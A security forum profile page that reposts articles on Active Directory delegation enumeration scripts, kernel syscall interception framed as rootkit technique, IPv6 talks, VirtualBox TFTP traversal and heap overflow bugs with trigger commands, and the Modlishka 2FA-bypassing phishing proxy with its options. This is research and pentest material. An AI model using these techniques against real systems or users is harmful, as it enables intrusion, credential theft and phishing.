Jump to content


  • Content Count

  • Joined

  • Last visited

  • Days Won


Nytro last won the day on January 7

Nytro had the most liked content!

Community Reputation

3417 Excellent

About Nytro

  • Rank
  • Birthday 03/11/1991

Recent Profile Visitors

22204 profile views
  1. Nytro

    Cafea combinata cu bauturi energizante

    Am abuzat de energizante si nu a fost bine. Am renuntat complet la ele. Somnul e baza. Cat se poate, e util din multe puncte de vedere si nicio substanta nu il poate inlocui.
  2. Nytro


    Depinde de tine. Sunt lucruri diferite. Pentester e mai mult pe parte de "atacator" pe cand security analyst e mai mult pe partea de aparare.
  3. Hunting the Delegation Access January 17, 2019 Active Directory (AD) delegation is a fascinating subject, and we have previously discussed it in a blog post and later in a webinar. To summarize, Active Directory has a capability to delegate certain rights to non (domain/forest/enterprise) admin users to perform administrative tasks over a specific section of AD. This capability, if miss-configured, can become a major reason for AD compromise. Earlier we only talked about manual analysis for finding such delegations. Another article which can be found here covered multiple other tools which can help in such manual analysis. Today, we are going to look at other possible options to hunt for these delegations across a network in an (semi-)automated manner via scripts. Setting the scene We’ll assume following scenarios: We have previously compromised a low privilege domain user with severe restrictions such as powershell execution disabled via AppLocker. We have a compromised local admin access on a domain joined machine. This local admin access allows us to run unrestricted powershell scripts however we would require the domain login to perform enumeration on the AD domain. To achieve that, we will use two different approaches: Using AD ACLScanner (Semi Automated) and Using Custom Powershell Script by NSS (Fully Automated) Using ADACLScanner This tool is written by canix1 and is useful for generic ACL scanning. It can be found on github (https://github.com/canix1/ADACLScanner). We can repurpose this tool to perform the tasks of AD delegation hunting. We will explain this process with the help of an example below: When you run a powershell script from ADACLScanner you are greeted with a nice GUI (one of the rare tools in powershell with a nice GUI). ADACLScanner So let’s say, we connect to one of the AD named “plum”, available at as shown in the screenshot below. Connecting to AD When we click on connect in the first column, we will be prompted to enter a domain credential so that it can enumerate the node. It should be noted that this domain credential could be of any low privilege user in the domain. Requesting Domain Credentials Once we enter the domain credentials correctly, we will be shown the available nodes, as shown below. Listing AD Nodes Now all we got to do is highlight the node in the first column, make sure inherited permissions is unticked and click on run scan. In the above scenario we selected the highest node that is “DC=plum,DC=local”. The report that is generated after the scan is completed, will look somewhat as shown below. ACL Scanner Report If we highlight Regions node and run the scan then the report will look somewhat different. You can notice that the Object column in the report is giving you details of the node for which ACL report has been extracted. So the OU here is Regions. ACL Report for Regions OU Similarly if you run scan for the USA OU from objects column as shown below, the report will state the delegation permissions for the OU of USA. AD ACL Scanner report for OU USA The hassle here is that you have to manually hunt every node and then analyze every entry to find the correct delegation. It is fine for a small network but the task may become a nightmare if you are dealing with a large network. This is where our second approach could be useful. Using Custom Powershell Script by NSS Let me first show you the working of this script which has been prepared by our team If you are only concerned about the automated script, here is the online version of it go and grab it. If you are interested in internal working of the script here is a block by block breakdown of the script. Getting User Credentials and AD Drive Hack We started with a non-domain, but local admin user. This is the reason that we get the below listed error whenever we try to mount an AD Drive or import active directory modules. AD Module Import Error To get around this, we passed “-WarningAction SilentlyContinue” parameter. Let us dissect the script, the first bit reads like below: Import-Module ActiveDirectory -WarningAction SilentlyContinue # force use of specified credentials everywhere $creds=Get-Credential $PSDefaultParameterValues = @{"*-AD*:Credential"=$creds} # GET DC Name $dcname=(Get-ADDomainController).Name New-PSDrive -Name AD -PSProvider ActiveDirectory -Server $dcname -Root //RootDSE/ -Credential $creds Set-Location AD: Here is a better understanding of the command listed above: Since we are performing actions as a non domain user, we started by importing “ActiveDirectory” module with “-WarningAction SilentlyContinue”. This allowed us to import the module but the AD Drive was not mounted. Next we attempted to get Credentials from the user. As user credentials were added we then set “PSDefaultParameterValues” for all Commands with “-AD” in them. Now we attempted to mount the AD Drive with this newly acquired credential and for this we needed a server name which we was seamlessly obtained using the “Get-ADDomainController” commandlet. This would not be required if you are already logged in as a domain user. However we wanted to take the worst case scenario where you might have access to a system as a local admin hence unrestricted powershell access but limited domain user credentials. Navigating Entire OU Get all Domain Names, Organization Units, and individual ADObject $OUs = @(Get-ADDomain | Select-Object -ExpandProperty DistinguishedName) $OUs += Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName $OUs += Get-ADObject -SearchBase (Get-ADDomain).DistinguishedName -SearchScope OneLevel -LDAPFilter '(objectClass=container)' | Select-Object -ExpandProperty DistinguishedName Let us understand what happens here, the first line executes the “Get-ADDomain” and fetches the column of “DistinguishedName”, the second line adds to the OUs object content of “Get-ADOrganizationalUnit” starting filter is “*” and then taking the distinguished name from those objects. The third line fetches the AD objects of AD domain distinguished names, taking only one level with an “LdapFilter” where object class is container and printing out the “DistinguishedName” column. Adding Exclusions $domain = (Get-ADDomain).Name $groups_to_ignore = ( "$domain\Enterprise Admins", "$domain\Domain Admins") # 'NT AUTHORITY\SYSTEM', 'S-1-5-32-548', 'NT AUTHORITY\SELF' These lines show how we are adding more exclusions to the list. We are first fetching the domain name and post that,providing a list of groups to be ignored. Extracting Relevant Domain User/Group Permissions ForEach ($OU in $OUs) { $report += Get-Acl -Path "AD:\$OU" | Select-Object -ExpandProperty Access | ? {$_.IdentityReference -match "$domain*" -and $_.IdentityReference -notin $groups_to_ignore} | Select-Object @{name='organizationalUnit';expression={$OU}}, ` @{name='objectTypeName';expression={if ($_.objectType.ToString() -eq '00000000-0000-0000-0000-000000000000') {'All'} Else {$schemaIDGUID.Item($_.objectType)}}}, ` @{name='inheritedObjectTypeName';expression={$schemaIDGUID.Item($_.inheritedObjectType)}}, ` * } As we saw previously in second step (i.e. during navigation), we stored all the information in the $OUs, now here we are using a “ForEach” loop to extract all the information and process it. The first three lines in the ForEach loop fetches the ACL path of all the entities in the $OUs by ensuring there is a match of “IdentityReference” with the Domain and not a part of the Groups to ignore list. The Groups to ignore list can be seen in step 4. Continuing from Line 4 the command basically selects objects like organizationalUnit with Expression of the entity in the $OUs and “ObjectTypeName” with condition that if the object type is equal to root GUID else fetch the details of the “SchemaIDGUID” based on the object type value. Inheritance == False Inheritance as false is the key to everything. We need only the lines where inheritance is false. $filterrep= $report | Where-Object {-not $_.IsInherited} This ensures that inherited objects are not shown in the output. Array Conversion Array to Console Table Write-Output ( $filterrep | Select-Object OrganizationalUnit,ObjectTypeName,ActiveDirectoryRights,IdentityReference | Format-Table | Out-String) This finally results in a neatly formatted table with list of users having any non-inherited i.e. delegated rights on specific objects. By Default, the delegated rights cascade down the OU tree so if top level OU has the rights, it would automatically cascade down to the next OU section unless and until explicitly removed. Result of Automated Script <shameless plug> This, and other such useful techniques, have been demonstrated in our latest Advanced Infrastructure Hacking course – 2019 edition. We also provide in-house training and CTF’s for internal security and SOC teams to help them advance their skill sets. </shameless plug> Sursa: https://www.notsosecure.com/hunting-the-delegation-access/
  4. How to write a rootkit without really trying POST JANUARY 17, 2019 LEAVE A COMMENT We open-sourced a fault injection tool, KRF, that uses kernel-space syscall interception. You can use it today to find faulty assumptions (and resultant bugs) in your programs. Check it out! This post covers intercepting system calls from within the Linux kernel, via a plain old kernel module. We’ll go through a quick refresher on syscalls and why we might want to intercept them and then demonstrate a bare-bones module that intercepts the read(2) syscall. But first, you might be wondering: What makes this any different from $other_fault_injection_strategy? Other fault injection tools rely on a few different techniques: There’s the well-known LD_PRELOAD trick, which really intercepts the syscall wrapper exposed by libc (or your language runtime of choice). This often works (and can be extremely useful for e.g. spoofing the system time within a program or using SOCKS proxies transparently), but comes with some major downsides: LD_PRELOAD only works when libc (or the target library of choice) has been dynamically linked, but newer languages (read: Go) and deployment trends (read: fully static builds and non-glibc Linux containers) have made dynamic linkage less popular. Syscall wrappers frequently deviate significantly from their underlying syscalls: depending on your versions of Linux and glibc open() may call openat(2), fork() may call clone(2), and other calls may modify their flags or default behavior for POSIX compliance. As a result, it can be difficult to reliably predict whether a given syscall wrapper invokes its syscall namesake. Dynamic instrumentation frameworks like DynamoRIO or Intel PIN can be used to identify system calls at either the function or machine-code level and instrument their calls and/or returns. While this grants us fine-grained access to individual calls, it usually comes with substantial runtime overhead. Injecting faults within kernelspace sidesteps the downsides of both of these approaches: it rewrites the actual syscalls directly instead of relying on the dynamic loader, and it adds virtually no runtime overhead (beyond checking to see whether a given syscall is one we’d like to fault). What makes this any different from $other_blog_post_on_syscall_interception? Other blog posts address the interception of syscalls, but many: Grab the syscall table by parsing their kernel’s System.map, which can be unreliable (and is slower than the approach we give below). Assume that the kernel exports sys_call_table and that extern void *sys_call_table will work (not true on Linux 2.6+). Involve prodding large ranges of kernel memory, which is slow and probably dangerous. Basically, we couldn’t find a recent (>2015) blog post that described a syscall interception process that we liked. So we developed our own. Why not just use eBPF or kprobes? eBPF can’t intercept syscalls. It can only record their parameters and return types. The kprobes API might be able to perform interception from within a kernel module, although I haven’t come across a really good source of information about it online. In any case, the point here is to do it ourselves! Will this work on $architecture? For the most part, yes. You’ll need to make some adjustments to the write-unlocking macro for non-x86 platforms. What’s a syscall? A syscall, or system call, is a function1 that exposes some kernel-managed resource (I/O, process control, networking, peripherals) to user-space processes. Any program that takes user input, communicates with other programs, changes files on disk, uses the system time, or contacts another device over a network (usually) does so via syscalls.2 The core UNIX-y syscalls are fairly primitive: open(2), close(2), read(2), and write(2) for the vast majority of I/O; fork(2), kill(2), signal(2), exit(2), and wait(2) for process management; and so forth. The socket management syscalls are mostly bolted on to the UNIX model: send(2) and recv(2) behave much like read(2) and write(2), but with additional transmission flags. ioctl(2) is the kernel’s garbage dump, overloaded to perform every conceivable operation on a file descriptor where no simpler means exists. Despite these additional complexities in usage, the underlying principle behind their usage (and interception) remains the same. If you’d like to dive all the way in, Filippo Valsorda maintains an excellent Linux syscall reference for x86 and x86_64. Unlike regular function calls in user-space, syscalls are extraordinarily expensive: on x86 architectures, int 80h (or the more modern sysenter/syscall instructions) causes both the CPU and the kernel to execute slow interrupt-handling code paths as well as perform a privilege-context switch.3 Why intercept syscalls? For a few different reasons: We’re interested in gathering statistics about a given syscall’s usage, beyond what eBPF or another instrumentation API could (easily) provide. We’re interested in fault injection that can’t be avoided by static linking or manual syscall(3) invocations (our use case). We’re feeling malicious, and we want to write a rootkit that’s hard to remove from user-space (and possibly even kernel-space, with a few tricks).4 Why do I need fault injection? Fault injection finds bugs in places that fuzzing and conventional unit testing often won’t: NULL dereferences caused by assuming that particular functions never fail (are you sure you always check whether getcwd(2) succeeds?) Are you sure that you’re doing better than systemd? Memory corruption caused by unexpectedly small buffers, or disclosure caused by unexpectedly large buffers Integer over/underflow caused by invalid or unexpected values (are you sure you’re not making incorrect assumptions about stat(2)‘s atime/mtime/ctime fields?) Getting started: Finding the syscall table Internally, the Linux kernel stores syscalls within the syscall table, an array of __NR_syscalls pointers. This table is defined as sys_call_table, but has not been directly exposed as a symbol (to kernel modules) since Linux 2.5. First thing, we need to get the syscall table’s address, ideally without using the System.map file or scanning kernel memory for well-known addresses. Luckily for us, Linux provides a superior interface than either of these: kallsyms_lookup_name. This makes retrieving the syscall table as easy as: 1 2 3 4 5 6 7 8 9 10 11 12 static unsigned long *sys_call_table; int init_module(void) { sys_call_table = (void *)kallsyms_lookup_name("sys_call_table"); if (sys_call_table == NULL) { printk(KERN_ERR "Couldn't look up sys_call_table\n"); return -1; } return 0; } Of course, this only works if your Linux kernel was compiled with CONFIG_KALLSYMS=1. Debian and Ubuntu provide this, but you may need to test in other distros. If your distro doesn’t enable kallsyms by default, consider using a VM for one that does (you weren’t going to test this code on your host, were you?). Injecting our replacement syscalls Now that we have the kernel’s syscall table, injecting our replacement should be as easy as: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 static unsigned long *sys_call_table; static typeof(sys_read) *orig_read; /* asmlinkage is important here -- the kernel expects syscall parameters to be * on the stack at this point, not inside registers. */ asmlinkage long phony_read(int fd, char __user *buf, size_t count) { printk(KERN_INFO "Intercepted read of fd=%d, %lu bytes\n", fd, count); return orig_read(fd, buf, count); } int init_module(void) { sys_call_table = (void *)kallsyms_lookup_name("sys_call_table"); if (sys_call_table == NULL) { printk(KERN_ERR "Couldn't look up sys_call_table\n"); return -1; } orig_read = (typeof(sys_read) *)sys_call_table[__NR_read]; sys_call_table[__NR_read] = (void *)&phony_read; return 0; } void cleanup_module(void) { /* Don't forget to fix the syscall table on module unload, or you'll be in * for a nasty surprise! */ sys_call_table[__NR_read] = (void *)orig_read; } …but it isn’t that easy, at least not on x86: sys_call_table is write-protected by the CPU itself. Attempting to modify it will cause a page fault (#PF) exception.5 To get around this, we twiddle the 16th bit of the cr0 register, which controls the write-protect state: 1 2 3 4 5 6 #define CR0_WRITE_UNLOCK(x) \ do { \ write_cr0(read_cr0() & (~X86_CR0_WP)); \ x; \ write_cr0(read_cr0() | X86_CR0_WP); \ } while (0) Then, our insertions become a matter of: 1 2 3 CR0_WRITE_UNLOCK({ sys_call_table[__NR_read] = (void *)&phony_read; }); and: 1 2 3 CR0_WRITE_UNLOCK({ sys_call_table[__NR_read] = (void *)orig_read; }); and everything works as expected…almost. We’ve assumed a single processor; there’s an SMP-related race condition bug in the way we twiddle cr0. If our kernel task were preempted immediately after disabling write-protect and placed onto another core with WP still enabled, we’d get a page fault instead of a successful memory write. The chances of this happening are pretty slim, but it doesn’t hurt to be careful by implementing a guard around the critical section: 1 2 3 4 5 6 7 8 9 10 11 12 13 #define CR0_WRITE_UNLOCK(x) \ do { \ unsigned long __cr0; \ preempt_disable(); \ __cr0 = read_cr0() & (~X86_CR0_WP); \ BUG_ON(unlikely((__cr0 & X86_CR0_WP))); \ write_cr0(__cr0); \ x; \ __cr0 = read_cr0() | X86_CR0_WP; \ BUG_ON(unlikely(!(__cr0 & X86_CR0_WP))); \ write_cr0(__cr0); \ preempt_enable(); \ } while (0) (The astute will notice that this is almost identical to the “rare write” mechanism from PaX/grsecurity. This is not a coincidence: it’s based on it!) What’s next? The phony_read above just wraps the real sys_read and adds a printk, but we could just as easily have it inject a fault: 1 2 3 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { return -ENOSYS; } …or a fault for a particular user: 1 2 3 4 5 6 7 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { if (current_uid().val == 1005) { return -ENOSYS; } else { return orig_read(fd, buf, count); } } …or return bogus data: 1 2 3 4 5 6 7 8 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { unsigned char kbuf[1024]; memset(kbuf, 'A', sizeof(kbuf)); copy_to_user(buf, kbuf, sizeof(kbuf)); return sizeof(kbuf); } Syscalls happen under task context within the kernel, meaning that the current task_struct is valid. Opportunities for poking through kernel structures abound! Wrap up This post covers the very basics of kernel-space syscall interception. To do anything really interesting (like precise fault injection or statistics beyond those provided by official introspection APIs), you’ll need to read a good kernel module programming guide6 and do the legwork yourself. Our new tool, KRF, does everything mentioned above and more: it can intercept and fault syscalls with per-executable precision, operate on an entire syscall “profile” (e.g., all syscalls that touch the filesystem or perform process scheduling), and can fault in real-time without breaking a sweat. Oh, and static linkage doesn’t bother it one bit: if your program makes any syscalls, KRF will happily fault them. Other work Outside of kprobes for kernel-space interception and LD_PRELOAD for user-space interception of wrappers, there are a few other clever tricks out there: syscall_intercept is loaded through LD_PRELOAD like a normal wrapper interceptor, but actually uses capstone internally to disassemble (g)libc and instrument the syscalls that it makes. This only works on syscalls made by the libc wrappers, but it’s still pretty cool. ptrace(2) can be used to instrument syscalls made by a child process, all within user-space. It comes with two considerable downsides, though: it can’t be used in conjunction with a debugger, and it returns (PTRACE_GETREGS) architecture-specific state on each syscall entry and exit. It’s also slow. Chris Wellons’s awesome blog post covers ptrace(2)‘s many abilities. More of a “service request” than a “function” in the ABI sense, but thinking about syscalls as a special class of functions is a serviceable-enough fabrication. The number of exceptions to this continues to grow, including user-space networking stacks and the Linux kernel’s vDSO for many frequently called syscalls, like time(2). No process context switch is necessary. Linux executes syscalls within the same underlying kernel task that the process belongs to. But a processor context switch does occur. I won’t detail this because it’s outsite of this post’s scope, but consider that init_module(2) and delete_module(2) are just normal syscalls. Sidenote: this is actually how CoW works on Linux. fork(2) write-protects the pre-duplicated process space, and the kernel waits for the corresponding page fault to tell it to copy a page to the child. This one’s over a decade old, but it covers the basics well. If you run into missing symbols or changed signatures, you should find the current equivalents with a quick search. Sursa: https://blog.trailofbits.com/2019/01/17/how-to-write-a-rootkit-without-really-trying/
  5. IPv6 Talks & Publications At first a very happy new year to everybody! While thinking about the agenda of the upcoming Troopers NGI IPv6 Track I realized that quite a lot of IPv6-related topics have been covered in the last years by various IPv6 practitioners (like my colleague Christopher Werny) or researchers (like my friend Antonios Atlasis). In a kind of shameless self plug I then decided to put together of list of IPv6 talks I myself gave at several occasions and of publications I (co-) authored. Please find this list below (sorted by years); you can click on the titles to access the respective documents/sources. I hope some of this can be of help for one or the other among you in the course of your own IPv6 efforts. Cheers, Enno 2018 IPv6 Address Management – The First Five Years Properties of IPv6 and Their Implications for Offense & Defense 2017 Why it might make sense to use IPv6 in enterprise infrastructure projects Position Paper on an Enterprise Organization’s IPv6 Address Strategy Balanced Security for IPv6 CPE Revisited Local Packet Filtering with IPv6 IPv6 Address Selection – A Look from the Lab Why IPv6 Security Is So Hard – Structural Deficits of IPv6 & Their Implications Testing RFC 6980 Implementations with Chiron IPv6 configuration approaches for servers / slides with additional infos IPv6 Properties of Windows Server 2016 / Windows 10 2016 Real Life Use Cases and Challenges When Implementing Link-local Addressing Only Networks as of RFC 7404 IPv6 from a Developers’ Perspective Things to Consider When Deploying IPv6 in Enterprise Space IPv6 & Threat Intelligence Protecting Hosts in IPv6 Networks Remote Access and Business Partner Connections Developing an Enterprise IPv6 Security Strategy Dual Stack vs. IPv6-only in Enterprise Networks Things to Consider When Starting Your IPv6 Deployment IPv6 Address Planning in 2016 / Observations 2015 Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security Developing an Enterprise IPv6 Security Strategy / Part 2: Network Isolation on the Routing Layer Developing an Enterprise IPv6 Security Strategy / Part 3: Traffic Filtering in IPv6 Networks (I) Developing an Enterprise IPv6 Security Strategy / Part 4: Traffic Filtering in IPv6 Networks (II) Developing an Enterprise IPv6 Security Strategy / Part 5: First Hop Security Features Developing an Enterprise IPv6 Security Strategy / Part 6: Controls on the Host Level Some Notes on the “Drop IPv6 Fragments” vs. “This Will Break DNS[SEC]” Debate IPv6 Router Advertisement Flags, RDNSS and DHCPv6 Conflicting Configurations Main IPv6 Related Mailing Lists IPv6 in Virtualized Data Centers The Strange Case of $SOME_SOFTWARE Adding an IPv6 Extension Header, and an Internet Router Dropping Them Will It Be Routed? Evasion of Cisco ACLs by (Ab)Using IPv6 IPv6 Address Planning / Some Notes OS IPv6 Behavior in Conflicting Environments What to Do Today if You Want to Deploy IPv6 Tomorrow Is IPv6 more Secure than IPv4? Or Less? IPv6 & Complexity MLD Considered Harmful Reliable & Secure DHCPv6 IPv6-related Requirements for the Internet Uplink or MPLS Networks An MLD Testing Methodology Is RFC 6939 Support Finally Here – Checking the Implementation of the “Client Link Layer Address Option” in DHCPv6 /48 Considered Harmful. On the Interaction of Strict IPv6 Prefix Filtering and the Needs of Enterprise LIRs The Persistent Problem of State in IPv6 (Security) IPv6-related Requirements for Security Devices Evaluation of IPv6 Capabilities of Commercial IPAM Solutions 2014 Security Implications of Using IPv6 GUAs Only Dynamics of IPv6 Prefixes within the LIR Scope in the RIPE NCC Region Evasion of High-End IDPS Devices at the IPv6 Era IPv6 in RFIs/Tendering Processes Protocol Properties & Attack Vectors Router Advertisement Options to the Rescue – A Deep Dive into DHCPv6, Part 2 I Don’t Have Any Neighbors – A Deep Dive into DHCPv6, Part 1 Security Implications of Disruptive Technologies IPv6 for Managers IPv6 Requirements for Cloud Service Providers IPv6 Address Plan Considerations, Part 3: The Plan IPv6 Address Plan Considerations, Part 2: The “PI Space from (Single|Multiple) RIR(s) Debate” IPv6 Address Plan Considerations, Part 1: General Guidelines 2013 Design & Configuration of IPv6 Segments with High Security Requirements IPv6 Capabilities of Commercial Security Components IPAM Requirements in IPv6 Networks IPv6 Neighbor Cache Exhaustion Attacks – Risk Assessment & Mitigation Strategies, Part 1 2012 IPv6 Privacy Extensions 2011 Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt IPv6 Security Part 2, RA Guard – Let’s get practical IPv6 Security Part 1, RA Guard – The Theory Sursa: https://insinuator.net/2019/01/ipv6-talks-publications/
  6. VirtualBox TFTP server (PXE boot) directory traversal and heap overflow vulnerabilities - [CVE-2019-2552, CVE-2019-2553] In my previous blog post I wrote about VirtualBox DHCP bugs which can be triggered from an unprivileged guest user, in the default configuration and without Guest Additions installed. TFTP server for PXE boot is another attack surface which can be reached from the same configuration. VirtualBox in NAT mode (default configuration) runs a read only TFTP server in the IP address to support PXE boot. CVE-2019-2553 - Directory traversal vulnerability The source code of the TFTP server is at src/VBox/Devices/Network/slirp/tftp.c and it is based on the TFTP server used in QEMU. The below comment can be found in the source: * This code is based on: * * tftp.c - a simple, read-only tftp server for qemu The guest provided file path is validated using the function tftpSecurityFilenameCheck() as below: /** * This function evaluate file name. * @param pu8Payload * @param cbPayload * @param cbFileName * @return VINF_SUCCESS - * VERR_INVALID_PARAMETER - */ DECLINLINE(int) tftpSecurityFilenameCheck(PNATState pData, PCTFTPSESSION pcTftpSession) { size_t cbSessionFilename = 0; int rc = VINF_SUCCESS; AssertPtrReturn(pcTftpSession, VERR_INVALID_PARAMETER); cbSessionFilename = RTStrNLen((const char *)pcTftpSession->pszFilename, TFTP_FILENAME_MAX); if ( !RTStrNCmp((const char*)pcTftpSession->pszFilename, "../", 3) || (pcTftpSession->pszFilename[cbSessionFilename - 1] == '/') || RTStrStr((const char *)pcTftpSession->pszFilename, "/../")) rc = VERR_FILE_NOT_FOUND; /* only allow exported prefixes */ if ( RT_SUCCESS(rc) && !tftp_prefix) rc = VERR_INTERNAL_ERROR; LogFlowFuncLeaveRC(rc); return rc; } This code again is based on the validation done in QEMU (slirp/tftp.c) /* do sanity checks on the filename */ if (!strncmp(req_fname, "../", 3) || req_fname[strlen(req_fname) - 1] == '/' || strstr(req_fname, "/../")) { tftp_send_error(spt, 2, "Access violation", tp); return; } Interesting observation here is, above validation done in QEMU is specific to Linux hosts. However, VirtualBox relies on the same validation for Windows hosts too. Since backslash can be used as directory separator in Windows, validations done in tftpSecurityFilenameCheck() can be bypassed to read host files accessible under the privileges of the VirtualBox process. The default path to TFTP root folder is C:\Users\\.VirtualBox\TFTP. Payload to read other files from the host needs to be crafted accordingly. Below is the demo: CVE-2019-2552 - Heap overflow due to incorrect validation of TFTP blocksize option The function tftpSessionOptionParse() sets the value of TFTP options DECLINLINE(int) tftpSessionOptionParse(PTFTPSESSION pTftpSession, PCTFTPIPHDR pcTftpIpHeader) { ... else if (fWithArg) { if (!RTStrICmp("blksize", g_TftpDesc[idxOptionArg].pszName)) { rc = tftpSessionParseAndMarkOption(pszTftpRRQRaw, &pTftpSession->OptionBlkSize); if (pTftpSession->OptionBlkSize.u64Value > UINT16_MAX) rc = VERR_INVALID_PARAMETER; } ... 'blksize' option is checked if the value is > UINT16_MAX. Later the value OptionBlkSize.u64Value gets used in tftpReadDataBlock() to read the file content DECLINLINE(int) tftpReadDataBlock(PNATState pData, PTFTPSESSION pcTftpSession, uint8_t *pu8Data, int *pcbReadData) { RTFILE hSessionFile; int rc = VINF_SUCCESS; uint16_t u16BlkSize = 0; . . . AssertReturn(pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX, VERR_INVALID_PARAMETER); . . . u16BlkSize = (uint16_t)pcTftpSession->OptionBlkSize.u64Value; . . . rc = RTFileRead(hSessionFile, pu8Data, u16BlkSize, &cbRead); . . . } pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX validation is incorrect. During the call to RTFileRead(), the file contents can overflow the buffer adjacent to 'pu8Data' by setting a value for blksize greater than the MTU. This bug can be used in combination with directory traversal bug to trigger the heap overflow with controlled data e.g. if shared folders are enabled, guest can drop a file with arbitrary contents in the host, then read the file using directory traversal bug. For the ease of debugging lets use VirtualBox for Linux. Create a file of size say UINT16_MAX in the host TFTP root folder i.e. ~/.config/VirtualBox/TFTP, then read the file from the guest with a large blksize value guest@ubuntu:~$ atftp --trace --verbose --option "blksize 65535" --get -r payload -l payload Thread 30 "NAT" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7fff8ccf4700 (LWP 11024)] [----------------------------------registers-----------------------------------] RAX: 0x4141414141414141 ('AAAAAAAA') RBX: 0x7fff8e5f16dc ('A' ...) RCX: 0x1 RDX: 0x4141414141414141 ('AAAAAAAA') RSI: 0x800 RDI: 0x140e730 --> 0x219790326 RBP: 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...) RSP: 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...) RIP: 0x7fff9457d8a8 (<slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx) R8 : 0x0 R9 : 0x10 R10: 0x41414141 ('AAAA') R11: 0x7fff8e5f1de4 ('A' ...) R12: 0x140e720 --> 0xdead0002 R13: 0x7fff8e5f1704 ('A' ...) R14: 0x140e7b0 --> 0x7fff8e5f16dc ('A' ...) R15: 0x140e730 --> 0x219790326 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7fff9457d89f <slirp_uma_alloc>: test rax,rax 0x7fff9457d8a2 <slirp_uma_alloc>: je 0x7fff9457d8b0 <slirp_uma_alloc> 0x7fff9457d8a4 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20] => 0x7fff9457d8a8 <slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx 0x7fff9457d8ac <slirp_uma_alloc>: mov rax,QWORD PTR [rbx+0x18] 0x7fff9457d8b0 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20] 0x7fff9457d8b4 <slirp_uma_alloc>: mov QWORD PTR [rdx],rax 0x7fff9457d8b7 <slirp_uma_alloc>: mov rax,QWORD PTR [r12+0x88] [------------------------------------stack-------------------------------------] 0000| 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...) 0008| 0x7fff8ccf39b8 --> 0x140e720 --> 0xdead0002 0016| 0x7fff8ccf39c0 --> 0x7fff8e5eddde --> 0x5b0240201045 0024| 0x7fff8ccf39c8 --> 0x140dac4 --> 0x0 0032| 0x7fff8ccf39d0 --> 0x140e730 --> 0x219790326 0040| 0x7fff8ccf39d8 --> 0x140dac4 --> 0x0 0048| 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...) 0056| 0x7fff8ccf39e8 --> 0x7fff9457df41 (<uma_zalloc_arg>: test rax,rax) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV Posted by Reno Robert at 6:41 PM Sursa: https://www.voidsecurity.in/2019/01/virtualbox-tftp-server-pxe-boot.html
  7. ..Modlishka.. Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side). Enjoy Features Some of the most important 'Modlishka' features : Support for majority of 2FA authentication schemes (by design). No website templates (just point Modlishka to the target domain - in most cases, it will be handled automatically). Full control of "cross" origin TLS traffic flow from your victims browsers (through custom new techniques). Flexible and easily configurable phishing scenarios through configuration options. Pattern based JavaScript payload injection. Striping website from all encryption and security headers (back to 90's MITM style). User credential harvesting (with context based on URL parameter passed identifiers). Can be extended with your ideas through plugins. Stateless design. Can be scaled up easily for an arbitrary number of users - ex. through a DNS load balancer. Web panel with a summary of collected credentials and user session impersonation (beta). Written in Go. Action "A picture is worth a thousand words": Modlishka in action against an example 2FA (SMS) enabled authentication scheme: https://vimeo.com/308709275 Note: google.com was chosen here just as a POC. Installation Latest source code version can be fetched from here (zip) or here (tar). Fetch the code with 'go get' : $ go get -u github.com/drk1wi/Modlishka Compile the binary and you are ready to go: $ cd $GOPATH/src/github.com/drk1wi/Modlishka/ $ make # ./dist/proxy -h Usage of ./dist/proxy: -cert string base64 encoded TLS certificate -certKey string base64 encoded TLS certificate key -certPool string base64 encoded Certification Authority certificate -config string JSON configuration file. Convenient instead of using command line switches. -credParams string Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex) -debug Print debug information -disableSecurity Disable security features like anti-SSRF. Disable at your own risk. -jsRules string Comma separated list of URL patterns and JS base64 encoded payloads that will be injected. -listeningAddress string Listening address (default "") -listeningPort string Listening port (default "443") -log string Local file to which fetched requests will be written (appended) -phishing string Phishing domain to create - Ex.: target.co -plugins string Comma seperated list of enabled plugin names (default "all") -postOnly Log only HTTP POST requests -rules string Comma separated list of 'string' patterns and their replacements. -target string Main target to proxy - Ex.: https://target.com -targetRes string Comma separated list of target subdomains that need to pass through the proxy -terminateTriggers string Comma separated list of URLs from target's origin which will trigger session termination -terminateUrl string URL to redirect the client after session termination triggers -tls Enable TLS (default false) -trackingCookie string Name of the HTTP cookie used to track the victim (default "id") -trackingParam string Name of the HTTP parameter used to track the victim (default "id") Usage Check out the wiki page for a more detailed overview of the tool usage. FAQ (Frequently Asked Questions) Blog post License Modlishka was made by Piotr Duszyński (@drk1wi). You can find the license here. Credits Thanks for helping with the code go to Giuseppe Trotta (@Giutro) Disclaimer This tool is made only for educational purposes and can be only used in legitimate penetration tests. Author does not take any responsibility for any actions taken by its 